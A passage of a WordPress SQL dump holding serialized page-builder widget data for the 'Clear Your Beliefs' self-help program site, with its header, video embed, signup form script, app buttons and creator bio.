Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1085, 1576, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 255px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1088, 1578, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:442:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1089, 1579, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 